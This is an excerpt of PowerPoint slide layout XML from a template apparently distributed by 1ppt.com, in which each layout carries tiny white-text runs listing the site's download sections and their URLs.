              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout140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40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40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40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4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41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41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41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41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41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41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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout141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41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41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41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4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42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42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42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42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42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42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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout142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42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42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42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4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43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43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43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43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43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43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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
